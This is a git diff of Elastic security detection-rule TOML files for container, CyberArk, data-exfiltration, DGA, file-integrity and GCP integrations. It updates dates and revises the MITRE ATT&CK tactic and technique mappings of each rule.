eb31c917b85..66be4c56c57 100644 --- a/rules/integrations/cloud_defend/persistence_suspicious_webserver_child_process_execution.toml +++ b/rules/integrations/cloud_defend/persistence_suspicious_webserver_child_process_execution.toml @@ -4,7 +4,7 @@ integration = ["cloud_defend"] maturity = "production" min_stack_comments = "Defend for Containers integration was re-introduced in 9.3.0" min_stack_version = "9.3.0" -updated_date = "2026/03/05" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -237,11 +237,6 @@ not ( [[rule.threat]] framework = "MITRE ATT&CK" -[rule.threat.tactic] -name = "Persistence" -id = "TA0003" -reference = "https://attack.mitre.org/tactics/TA0003/" - [[rule.threat.technique]] id = "T1505" name = "Server Software Component" @@ -252,14 +247,14 @@ id = "T1505.003" name = "Web Shell" reference = "https://attack.mitre.org/techniques/T1505/003/" +[rule.threat.tactic] +id = "TA0003" +name = "Persistence" +reference = "https://attack.mitre.org/tactics/TA0003/" + [[rule.threat]] framework = "MITRE ATT&CK" -[rule.threat.tactic] -name = "Execution" -id = "TA0002" -reference = "https://attack.mitre.org/tactics/TA0002/" - [[rule.threat.technique]] id = "T1059" name = "Command and Scripting Interpreter" @@ -270,15 +265,61 @@ id = "T1059.004" name = "Unix Shell" reference = "https://attack.mitre.org/techniques/T1059/004/" +[rule.threat.tactic] +id = "TA0002" +name = "Execution" +reference = "https://attack.mitre.org/tactics/TA0002/" + [[rule.threat]] framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1071" +name = "Application Layer Protocol" +reference = "https://attack.mitre.org/techniques/T1071/" + +[[rule.threat.technique]] +id = "T1095" +name = "Non-Application Layer Protocol" +reference = "https://attack.mitre.org/techniques/T1095/" + +[[rule.threat.technique]] +id = "T1105" +name = "Ingress Tool Transfer" +reference = "https://attack.mitre.org/techniques/T1105/" + [rule.threat.tactic] -name = "Command and Control" id = "TA0011" +name = "Command and Control" reference = "https://attack.mitre.org/tactics/TA0011/" +[[rule.threat]] +framework = "MITRE ATT&CK" + [[rule.threat.technique]] -name = "Application Layer Protocol" -id = "T1071" -reference = "https://attack.mitre.org/techniques/T1071/" +id = "T1552" +name = "Unsecured Credentials" +reference = "https://attack.mitre.org/techniques/T1552/" + +[[rule.threat.technique.subtechnique]] +id = "T1552.001" +name = "Credentials In Files" +reference = "https://attack.mitre.org/techniques/T1552/001/" + +[rule.threat.tactic] +id = "TA0006" +name = "Credential Access" +reference = "https://attack.mitre.org/tactics/TA0006/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1190" +name = "Exploit Public-Facing Application" +reference = "https://attack.mitre.org/techniques/T1190/" + +[rule.threat.tactic] +id = "TA0001" +name = "Initial Access" +reference = "https://attack.mitre.org/tactics/TA0001/" diff --git a/rules/integrations/cloud_defend/privilege_escalation_debugfs_launched_inside_a_privileged_container.toml b/rules/integrations/cloud_defend/privilege_escalation_debugfs_launched_inside_a_privileged_container.toml index de958bb3bd4..8bc0dec0005 100644 --- a/rules/integrations/cloud_defend/privilege_escalation_debugfs_launched_inside_a_privileged_container.toml +++ b/rules/integrations/cloud_defend/privilege_escalation_debugfs_launched_inside_a_privileged_container.toml @@ -4,7 +4,7 @@ integration = ["cloud_defend"] maturity = "production" min_stack_comments = "Defend for Containers integration was re-introduced in 9.3.0" min_stack_version = "9.3.0" -updated_date = "2026/01/15" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -108,3 +108,16 @@ reference = "https://attack.mitre.org/techniques/T1611/" id = "TA0004" name = "Privilege Escalation" reference = "https://attack.mitre.org/tactics/TA0004/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1006" +name = "Direct Volume Access" +reference = "https://attack.mitre.org/techniques/T1006/" + +[rule.threat.tactic] +id = "TA0005" +name = "Defense Evasion" +reference = "https://attack.mitre.org/tactics/TA0005/" diff --git a/rules/integrations/cloud_defend/privilege_escalation_potential_container_escape_via_modified_release_agent_file.toml b/rules/integrations/cloud_defend/privilege_escalation_potential_container_escape_via_modified_release_agent_file.toml index 1542c1df465..4b4422d6871 100644 --- a/rules/integrations/cloud_defend/privilege_escalation_potential_container_escape_via_modified_release_agent_file.toml +++ b/rules/integrations/cloud_defend/privilege_escalation_potential_container_escape_via_modified_release_agent_file.toml @@ -4,7 +4,7 @@ integration = ["cloud_defend"] maturity = "production" min_stack_comments = "Defend for Containers integration was re-introduced in 9.3.0" min_stack_version = "9.3.0" -updated_date = "2026/01/15" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -91,3 +91,16 @@ reference = "https://attack.mitre.org/techniques/T1611/" id = "TA0004" name = "Privilege Escalation" reference = "https://attack.mitre.org/tactics/TA0004/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1546" +name = "Event Triggered Execution" +reference = "https://attack.mitre.org/techniques/T1546/" + +[rule.threat.tactic] +id = "TA0003" +name = "Persistence" +reference = "https://attack.mitre.org/tactics/TA0003/" diff --git a/rules/integrations/cyberarkpas/privilege_escalation_cyberarkpas_recommended_events_to_monitor_promotion.toml b/rules/integrations/cyberarkpas/privilege_escalation_cyberarkpas_recommended_events_to_monitor_promotion.toml index ae927878370..5b7dd0fa5c3 100644 --- a/rules/integrations/cyberarkpas/privilege_escalation_cyberarkpas_recommended_events_to_monitor_promotion.toml +++ b/rules/integrations/cyberarkpas/privilege_escalation_cyberarkpas_recommended_events_to_monitor_promotion.toml @@ -3,7 +3,7 @@ creation_date = "2021/06/23" integration = ["cyberarkpas"] maturity = "production" promotion = true -updated_date = "2025/01/15" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -53,16 +53,17 @@ event.dataset:cyberarkpas.audit and [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1078" name = "Valid Accounts" reference = "https://attack.mitre.org/techniques/T1078/" - [rule.threat.tactic] id = "TA0004" name = "Privilege Escalation" reference = "https://attack.mitre.org/tactics/TA0004/" + [[rule.threat]] framework = "MITRE ATT&CK" @@ -71,3 +72,28 @@ id = "TA0001" name = "Initial Access" reference = "https://attack.mitre.org/tactics/TA0001/" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1555" +name = "Credentials from Password Stores" +reference = "https://attack.mitre.org/techniques/T1555/" + +[rule.threat.tactic] +id = "TA0006" +name = "Credential Access" +reference = "https://attack.mitre.org/tactics/TA0006/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1098" +name = "Account Manipulation" +reference = "https://attack.mitre.org/techniques/T1098/" + +[rule.threat.tactic] +id = "TA0003" +name = "Persistence" +reference = "https://attack.mitre.org/tactics/TA0003/" diff --git a/rules/integrations/ded/exfiltration_ml_high_bytes_destination_port.toml b/rules/integrations/ded/exfiltration_ml_high_bytes_destination_port.toml index cd93d27121e..78a1259f568 100644 --- a/rules/integrations/ded/exfiltration_ml_high_bytes_destination_port.toml +++ b/rules/integrations/ded/exfiltration_ml_high_bytes_destination_port.toml @@ -2,7 +2,7 @@ creation_date = "2023/09/22" integration = ["ded", "endpoint", "network_traffic"] maturity = "production" -updated_date = "2025/01/15" +updated_date = "2026/03/24" [rule] anomaly_threshold = 75 @@ -89,14 +89,26 @@ Machine learning models analyze network traffic to identify anomalies, such as d - Implement enhanced monitoring on the affected system and network segment to detect any further suspicious activity.""" [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1041" name = "Exfiltration Over C2 Channel" reference = "https://attack.mitre.org/techniques/T1041/" - [rule.threat.tactic] id = "TA0010" name = "Exfiltration" reference = "https://attack.mitre.org/tactics/TA0010/" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1571" +name = "Non-Standard Port" +reference = "https://attack.mitre.org/techniques/T1571/" + +[rule.threat.tactic] +id = "TA0011" +name = "Command and Control" +reference = "https://attack.mitre.org/tactics/TA0011/" diff --git a/rules/integrations/ded/exfiltration_ml_high_bytes_written_to_external_device.toml b/rules/integrations/ded/exfiltration_ml_high_bytes_written_to_external_device.toml index 8e885a4b26b..8b7205dff6a 100644 --- a/rules/integrations/ded/exfiltration_ml_high_bytes_written_to_external_device.toml +++ b/rules/integrations/ded/exfiltration_ml_high_bytes_written_to_external_device.toml @@ -2,7 +2,7 @@ creation_date = "2023/09/22" integration = ["ded", "endpoint"] maturity = "production" -updated_date = "2025/01/15" +updated_date = "2026/03/24" [rule] anomaly_threshold = 75 @@ -89,14 +89,18 @@ The detection rule leverages machine learning to identify anomalies in data tran - Consider deploying endpoint detection and response (EDR) solutions to enhance visibility and control over data movements to external devices.""" [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1052" name = "Exfiltration Over Physical Medium" reference = "https://attack.mitre.org/techniques/T1052/" +[[rule.threat.technique.subtechnique]] +id = "T1052.001" +name = "Exfiltration over USB" +reference = "https://attack.mitre.org/techniques/T1052/001/" [rule.threat.tactic] id = "TA0010" name = "Exfiltration" reference = "https://attack.mitre.org/tactics/TA0010/" - diff --git a/rules/integrations/ded/exfiltration_ml_high_bytes_written_to_external_device_airdrop.toml b/rules/integrations/ded/exfiltration_ml_high_bytes_written_to_external_device_airdrop.toml index a69cb0486c3..efabd632315 100644 --- a/rules/integrations/ded/exfiltration_ml_high_bytes_written_to_external_device_airdrop.toml +++ b/rules/integrations/ded/exfiltration_ml_high_bytes_written_to_external_device_airdrop.toml @@ -2,7 +2,7 @@ creation_date = "2023/09/22" integration = ["ded", "endpoint"] maturity = "production" -updated_date = "2025/01/15" +updated_date = "2026/03/24" [rule] anomaly_threshold = 75 @@ -90,14 +90,18 @@ Airdrop facilitates seamless file sharing between Apple devices, leveraging Blue - Update security policies and controls to restrict Airdrop usage to only trusted devices and networks, reducing the risk of future unauthorized data transfers.""" [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1011" name = "Exfiltration Over Other Network Medium" reference = "https://attack.mitre.org/techniques/T1011/" +[[rule.threat.technique.subtechnique]] +id = "T1011.001" +name = "Exfiltration Over Bluetooth" +reference = "https://attack.mitre.org/techniques/T1011/001/" [rule.threat.tactic] id = "TA0010" name = "Exfiltration" reference = "https://attack.mitre.org/tactics/TA0010/" - diff --git a/rules/integrations/ded/exfiltration_ml_rare_process_writing_to_external_device.toml b/rules/integrations/ded/exfiltration_ml_rare_process_writing_to_external_device.toml index d0c800d51aa..f4de893c2c1 100644 --- a/rules/integrations/ded/exfiltration_ml_rare_process_writing_to_external_device.toml +++ b/rules/integrations/ded/exfiltration_ml_rare_process_writing_to_external_device.toml @@ -2,7 +2,7 @@ creation_date = "2023/09/22" integration = ["ded", "endpoint"] maturity = "production" -updated_date = "2025/01/15" +updated_date = "2026/03/24" [rule] anomaly_threshold = 75 @@ -89,14 +89,18 @@ In modern environments, processes may write data to external devices for legitim - Update security policies and controls to prevent similar exfiltration attempts, such as restricting process permissions to write to external devices and enhancing endpoint protection measures.""" [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1052" name = "Exfiltration Over Physical Medium" reference = "https://attack.mitre.org/techniques/T1052/" +[[rule.threat.technique.subtechnique]] +id = "T1052.001" +name = "Exfiltration over USB" +reference = "https://attack.mitre.org/techniques/T1052/001/" [rule.threat.tactic] id = "TA0010" name = "Exfiltration" reference = "https://attack.mitre.org/tactics/TA0010/" - diff --git a/rules/integrations/dga/command_and_control_ml_dga_activity_using_sunburst_domain.toml b/rules/integrations/dga/command_and_control_ml_dga_activity_using_sunburst_domain.toml index 4754264f30d..c73adc011f1 100644 --- a/rules/integrations/dga/command_and_control_ml_dga_activity_using_sunburst_domain.toml +++ b/rules/integrations/dga/command_and_control_ml_dga_activity_using_sunburst_domain.toml @@ -2,7 +2,7 @@ creation_date = "2023/09/14" integration = ["dga", "endpoint", "network_traffic"] maturity = "production" -updated_date = "2025/04/22" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -99,19 +99,28 @@ Domain Generation Algorithms (DGAs) are used by adversaries to dynamically gener [[rule.threat]] framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1071" +name = "Application Layer Protocol" +reference = "https://attack.mitre.org/techniques/T1071/" + +[[rule.threat.technique.subtechnique]] +id = "T1071.004" +name = "DNS" +reference = "https://attack.mitre.org/techniques/T1071/004/" + [[rule.threat.technique]] id = "T1568" name = "Dynamic Resolution" reference = "https://attack.mitre.org/techniques/T1568/" + [[rule.threat.technique.subtechnique]] id = "T1568.002" name = "Domain Generation Algorithms" reference = "https://attack.mitre.org/techniques/T1568/002/" - - [rule.threat.tactic] id = "TA0011" name = "Command and Control" reference = "https://attack.mitre.org/tactics/TA0011/" - diff --git a/rules/integrations/dga/command_and_control_ml_dga_high_sum_probability.toml b/rules/integrations/dga/command_and_control_ml_dga_high_sum_probability.toml index afcf159faef..e02a63c654f 100644 --- a/rules/integrations/dga/command_and_control_ml_dga_high_sum_probability.toml +++ b/rules/integrations/dga/command_and_control_ml_dga_high_sum_probability.toml @@ -2,7 +2,7 @@ creation_date = "2023/09/14" integration = ["dga", "endpoint", "network_traffic"] maturity = "production" -updated_date = "2025/01/15" +updated_date = "2026/03/24" [rule] anomaly_threshold = 70 @@ -96,14 +96,28 @@ Domain Generation Algorithms (DGAs) are used by malware to dynamically generate - Escalate to incident response team: If the threat is confirmed and widespread, escalate the incident to the organization's incident response team for further investigation and coordinated response efforts.""" [[rule.threat]] framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1071" +name = "Application Layer Protocol" +reference = "https://attack.mitre.org/techniques/T1071/" + +[[rule.threat.technique.subtechnique]] +id = "T1071.004" +name = "DNS" +reference = "https://attack.mitre.org/techniques/T1071/004/" + [[rule.threat.technique]] id = "T1568" name = "Dynamic Resolution" reference = "https://attack.mitre.org/techniques/T1568/" +[[rule.threat.technique.subtechnique]] +id = "T1568.002" +name = "Domain Generation Algorithms" +reference = "https://attack.mitre.org/techniques/T1568/002/" [rule.threat.tactic] id = "TA0011" name = "Command and Control" reference = "https://attack.mitre.org/tactics/TA0011/" - diff --git a/rules/integrations/dga/command_and_control_ml_dns_request_high_dga_probability.toml b/rules/integrations/dga/command_and_control_ml_dns_request_high_dga_probability.toml index 1e9fe0424c3..1779d62bc79 100644 --- a/rules/integrations/dga/command_and_control_ml_dns_request_high_dga_probability.toml +++ b/rules/integrations/dga/command_and_control_ml_dns_request_high_dga_probability.toml @@ -2,7 +2,7 @@ creation_date = "2023/09/14" integration = ["dga", "endpoint", "network_traffic"] maturity = "production" -updated_date = "2025/01/15" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -98,19 +98,28 @@ Machine learning models analyze DNS requests to identify patterns indicative of [[rule.threat]] framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1071" +name = "Application Layer Protocol" +reference = "https://attack.mitre.org/techniques/T1071/" + +[[rule.threat.technique.subtechnique]] +id = "T1071.004" +name = "DNS" +reference = "https://attack.mitre.org/techniques/T1071/004/" + [[rule.threat.technique]] id = "T1568" name = "Dynamic Resolution" reference = "https://attack.mitre.org/techniques/T1568/" + [[rule.threat.technique.subtechnique]] id = "T1568.002" name = "Domain Generation Algorithms" reference = "https://attack.mitre.org/techniques/T1568/002/" - - [rule.threat.tactic] id = "TA0011" name = "Command and Control" reference = "https://attack.mitre.org/tactics/TA0011/" - diff --git a/rules/integrations/dga/command_and_control_ml_dns_request_predicted_to_be_a_dga_domain.toml b/rules/integrations/dga/command_and_control_ml_dns_request_predicted_to_be_a_dga_domain.toml index 4f2e1f35a0a..8db1349b652 100644 --- a/rules/integrations/dga/command_and_control_ml_dns_request_predicted_to_be_a_dga_domain.toml +++ b/rules/integrations/dga/command_and_control_ml_dns_request_predicted_to_be_a_dga_domain.toml @@ -2,7 +2,7 @@ creation_date = "2023/09/14" integration = ["dga", "endpoint", "network_traffic"] maturity = "production" -updated_date = "2025/01/15" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -99,19 +99,28 @@ Machine learning models can identify patterns in DNS requests that suggest the u [[rule.threat]] framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1071" +name = "Application Layer Protocol" +reference = "https://attack.mitre.org/techniques/T1071/" + +[[rule.threat.technique.subtechnique]] +id = "T1071.004" +name = "DNS" +reference = "https://attack.mitre.org/techniques/T1071/004/" + [[rule.threat.technique]] id = "T1568" name = "Dynamic Resolution" reference = "https://attack.mitre.org/techniques/T1568/" + [[rule.threat.technique.subtechnique]] id = "T1568.002" name = "Domain Generation Algorithms" reference = "https://attack.mitre.org/techniques/T1568/002/" - - [rule.threat.tactic] id = "TA0011" name = "Command and Control" reference = "https://attack.mitre.org/tactics/TA0011/" - diff --git a/rules/integrations/fim/persistence_suspicious_file_modifications.toml b/rules/integrations/fim/persistence_suspicious_file_modifications.toml index 4ef9a45946f..c1132aad536 100644 --- a/rules/integrations/fim/persistence_suspicious_file_modifications.toml +++ b/rules/integrations/fim/persistence_suspicious_file_modifications.toml @@ -2,7 +2,7 @@ creation_date = "2024/06/03" integration = ["fim"] maturity = "production" -updated_date = "2025/12/04" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -220,14 +220,24 @@ name = "RC Scripts" reference = "https://attack.mitre.org/techniques/T1037/004/" [[rule.threat.technique]] -id = "T1547" -name = "Boot or Logon Autostart Execution" -reference = "https://attack.mitre.org/techniques/T1547/" +id = "T1053" +name = "Scheduled Task/Job" +reference = "https://attack.mitre.org/techniques/T1053/" [[rule.threat.technique.subtechnique]] -id = "T1547.006" -name = "Kernel Modules and Extensions" -reference = "https://attack.mitre.org/techniques/T1547/006/" +id = "T1053.002" +name = "At" +reference = "https://attack.mitre.org/techniques/T1053/002/" + +[[rule.threat.technique]] +id = "T1098" +name = "Account Manipulation" +reference = "https://attack.mitre.org/techniques/T1098/" + +[[rule.threat.technique.subtechnique]] +id = "T1098.004" +name = "SSH Authorized Keys" +reference = "https://attack.mitre.org/techniques/T1098/004/" [[rule.threat.technique]] id = "T1136" @@ -249,6 +259,36 @@ id = "T1543.002" name = "Systemd Service" reference = "https://attack.mitre.org/techniques/T1543/002/" +[[rule.threat.technique]] +id = "T1546" +name = "Event Triggered Execution" +reference = "https://attack.mitre.org/techniques/T1546/" + +[[rule.threat.technique.subtechnique]] +id = "T1546.004" +name = "Unix Shell Configuration Modification" +reference = "https://attack.mitre.org/techniques/T1546/004/" + +[[rule.threat.technique.subtechnique]] +id = "T1546.017" +name = "Udev Rules" +reference = "https://attack.mitre.org/techniques/T1546/017/" + +[[rule.threat.technique]] +id = "T1547" +name = "Boot or Logon Autostart Execution" +reference = "https://attack.mitre.org/techniques/T1547/" + +[[rule.threat.technique.subtechnique]] +id = "T1547.006" +name = "Kernel Modules and Extensions" +reference = "https://attack.mitre.org/techniques/T1547/006/" + +[[rule.threat.technique.subtechnique]] +id = "T1547.013" +name = "XDG Autostart Entries" +reference = "https://attack.mitre.org/techniques/T1547/013/" + [[rule.threat.technique]] id = "T1556" name = "Modify Authentication Process" diff --git a/rules/integrations/gcp/collection_gcp_pub_sub_subscription_creation.toml b/rules/integrations/gcp/collection_gcp_pub_sub_subscription_creation.toml index 2ade101b010..33faa556722 100644 --- a/rules/integrations/gcp/collection_gcp_pub_sub_subscription_creation.toml +++ b/rules/integrations/gcp/collection_gcp_pub_sub_subscription_creation.toml @@ -2,7 +2,7 @@ creation_date = "2020/09/23" integration = ["gcp"] maturity = "production" -updated_date = "2025/01/15" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -81,14 +81,18 @@ event.dataset:gcp.audit and event.action:google.pubsub.v*.Subscriber.CreateSubsc [[rule.threat]] framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1119" +name = "Automated Collection" +reference = "https://attack.mitre.org/techniques/T1119/" + [[rule.threat.technique]] id = "T1530" name = "Data from Cloud Storage" reference = "https://attack.mitre.org/techniques/T1530/" - [rule.threat.tactic] id = "TA0009" name = "Collection" reference = "https://attack.mitre.org/tactics/TA0009/" - diff --git a/rules/integrations/gcp/collection_gcp_pub_sub_topic_creation.toml b/rules/integrations/gcp/collection_gcp_pub_sub_topic_creation.toml index 2f2e473a30c..0473d5f4fa8 100644 --- a/rules/integrations/gcp/collection_gcp_pub_sub_topic_creation.toml +++ b/rules/integrations/gcp/collection_gcp_pub_sub_topic_creation.toml @@ -2,7 +2,7 @@ creation_date = "2020/09/23" integration = ["gcp"] maturity = "production" -updated_date = "2025/01/15" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -84,14 +84,26 @@ event.dataset:gcp.audit and event.action:google.pubsub.v*.Publisher.CreateTopic [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1530" name = "Data from Cloud Storage" reference = "https://attack.mitre.org/techniques/T1530/" - [rule.threat.tactic] id = "TA0009" name = "Collection" reference = "https://attack.mitre.org/tactics/TA0009/" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1651" +name = "Cloud Administration Command" +reference = "https://attack.mitre.org/techniques/T1651/" + +[rule.threat.tactic] +id = "TA0002" +name = "Execution" +reference = "https://attack.mitre.org/tactics/TA0002/" diff --git a/rules/integrations/gcp/defense_evasion_gcp_firewall_rule_created.toml b/rules/integrations/gcp/defense_evasion_gcp_firewall_rule_created.toml index 6999cef9783..9d21843dd4f 100644 --- a/rules/integrations/gcp/defense_evasion_gcp_firewall_rule_created.toml +++ b/rules/integrations/gcp/defense_evasion_gcp_firewall_rule_created.toml @@ -2,7 +2,7 @@ creation_date = "2020/09/21" integration = ["gcp"] maturity = "production" -updated_date = "2025/01/15" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -87,14 +87,18 @@ event.dataset:gcp.audit and event.action:(*.compute.firewalls.insert or google.a [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1562" name = "Impair Defenses" reference = "https://attack.mitre.org/techniques/T1562/" +[[rule.threat.technique.subtechnique]] +id = "T1562.007" +name = "Disable or Modify Cloud Firewall" +reference = "https://attack.mitre.org/techniques/T1562/007/" [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" - diff --git a/rules/integrations/gcp/defense_evasion_gcp_firewall_rule_deleted.toml b/rules/integrations/gcp/defense_evasion_gcp_firewall_rule_deleted.toml index 6ac6b9d0085..d6c9d4f6b8f 100644 --- a/rules/integrations/gcp/defense_evasion_gcp_firewall_rule_deleted.toml +++ b/rules/integrations/gcp/defense_evasion_gcp_firewall_rule_deleted.toml @@ -2,7 +2,7 @@ creation_date = "2020/09/21" integration = ["gcp"] maturity = "production" -updated_date = "2025/01/15" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -84,14 +84,18 @@ event.dataset:gcp.audit and event.action:(*.compute.firewalls.delete or google.a [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1562" name = "Impair Defenses" reference = "https://attack.mitre.org/techniques/T1562/" +[[rule.threat.technique.subtechnique]] +id = "T1562.007" +name = "Disable or Modify Cloud Firewall" +reference = "https://attack.mitre.org/techniques/T1562/007/" [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" - diff --git a/rules/integrations/gcp/defense_evasion_gcp_firewall_rule_modified.toml b/rules/integrations/gcp/defense_evasion_gcp_firewall_rule_modified.toml index 3afdc0d904e..3e4fed7407c 100644 --- a/rules/integrations/gcp/defense_evasion_gcp_firewall_rule_modified.toml +++ b/rules/integrations/gcp/defense_evasion_gcp_firewall_rule_modified.toml @@ -2,7 +2,7 @@ creation_date = "2020/09/21" integration = ["gcp"] maturity = "production" -updated_date = "2025/01/15" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -87,14 +87,18 @@ event.dataset:gcp.audit and event.action:(*.compute.firewalls.patch or google.ap [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1562" name = "Impair Defenses" reference = "https://attack.mitre.org/techniques/T1562/" +[[rule.threat.technique.subtechnique]] +id = "T1562.007" +name = "Disable or Modify Cloud Firewall" +reference = "https://attack.mitre.org/techniques/T1562/007/" [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" - diff --git a/rules/integrations/gcp/defense_evasion_gcp_logging_bucket_deletion.toml b/rules/integrations/gcp/defense_evasion_gcp_logging_bucket_deletion.toml index 0959ed9e33e..8f5b62bc283 100644 --- a/rules/integrations/gcp/defense_evasion_gcp_logging_bucket_deletion.toml +++ b/rules/integrations/gcp/defense_evasion_gcp_logging_bucket_deletion.toml @@ -2,7 +2,7 @@ creation_date = "2020/09/21" integration = ["gcp"] maturity = "production" -updated_date = "2025/01/15" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -84,14 +84,18 @@ event.dataset:gcp.audit and event.action:google.logging.v*.ConfigServiceV*.Delet [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1562" name = "Impair Defenses" reference = "https://attack.mitre.org/techniques/T1562/" +[[rule.threat.technique.subtechnique]] +id = "T1562.008" +name = "Disable or Modify Cloud Logs" +reference = "https://attack.mitre.org/techniques/T1562/008/" [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" - diff --git a/rules/integrations/gcp/defense_evasion_gcp_logging_sink_deletion.toml b/rules/integrations/gcp/defense_evasion_gcp_logging_sink_deletion.toml index 36bd43f1c07..e31c93cdc88 100644 --- a/rules/integrations/gcp/defense_evasion_gcp_logging_sink_deletion.toml +++ b/rules/integrations/gcp/defense_evasion_gcp_logging_sink_deletion.toml @@ -2,7 +2,7 @@ creation_date = "2020/09/18" integration = ["gcp"] maturity = "production" -updated_date = "2025/01/15" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -81,14 +81,18 @@ event.dataset:gcp.audit and event.action:google.logging.v*.ConfigServiceV*.Delet [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1562" name = "Impair Defenses" reference = "https://attack.mitre.org/techniques/T1562/" +[[rule.threat.technique.subtechnique]] +id = "T1562.008" +name = "Disable or Modify Cloud Logs" +reference = "https://attack.mitre.org/techniques/T1562/008/" [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" - diff --git a/rules/integrations/gcp/defense_evasion_gcp_pub_sub_subscription_deletion.toml b/rules/integrations/gcp/defense_evasion_gcp_pub_sub_subscription_deletion.toml index b232902cc6d..e3ee14773ab 100644 --- a/rules/integrations/gcp/defense_evasion_gcp_pub_sub_subscription_deletion.toml +++ b/rules/integrations/gcp/defense_evasion_gcp_pub_sub_subscription_deletion.toml @@ -2,7 +2,7 @@ creation_date = "2020/09/23" integration = ["gcp"] maturity = "production" -updated_date = "2025/01/15" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -82,14 +82,26 @@ event.dataset:gcp.audit and event.action:google.pubsub.v*.Subscriber.DeleteSubsc [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1562" name = "Impair Defenses" reference = "https://attack.mitre.org/techniques/T1562/" - [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1489" +name = "Service Stop" +reference = "https://attack.mitre.org/techniques/T1489/" + +[rule.threat.tactic] +id = "TA0040" +name = "Impact" +reference = "https://attack.mitre.org/tactics/TA0040/" diff --git a/rules/integrations/gcp/defense_evasion_gcp_pub_sub_topic_deletion.toml b/rules/integrations/gcp/defense_evasion_gcp_pub_sub_topic_deletion.toml index 01e2afac043..3a37cf5ddb8 100644 --- a/rules/integrations/gcp/defense_evasion_gcp_pub_sub_topic_deletion.toml +++ b/rules/integrations/gcp/defense_evasion_gcp_pub_sub_topic_deletion.toml @@ -2,7 +2,7 @@ creation_date = "2020/09/18" integration = ["gcp"] maturity = "production" -updated_date = "2025/01/15" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -83,14 +83,26 @@ event.dataset:gcp.audit and event.action:google.pubsub.v*.Publisher.DeleteTopic [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1562" name = "Impair Defenses" reference = "https://attack.mitre.org/techniques/T1562/" - [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1489" +name = "Service Stop" +reference = "https://attack.mitre.org/techniques/T1489/" + +[rule.threat.tactic] +id = "TA0040" +name = "Impact" +reference = "https://attack.mitre.org/tactics/TA0040/" diff --git a/rules/integrations/gcp/defense_evasion_gcp_storage_bucket_configuration_modified.toml b/rules/integrations/gcp/defense_evasion_gcp_storage_bucket_configuration_modified.toml index d518d9a46db..57cc51606af 100644 --- a/rules/integrations/gcp/defense_evasion_gcp_storage_bucket_configuration_modified.toml +++ b/rules/integrations/gcp/defense_evasion_gcp_storage_bucket_configuration_modified.toml @@ -2,7 +2,7 @@ creation_date = "2020/09/22" integration = ["gcp"] maturity = "production" -updated_date = "2025/01/15" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -82,14 +82,18 @@ event.dataset:gcp.audit and event.action:"storage.buckets.update" and event.outc [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1578" name = "Modify Cloud Compute Infrastructure" reference = "https://attack.mitre.org/techniques/T1578/" 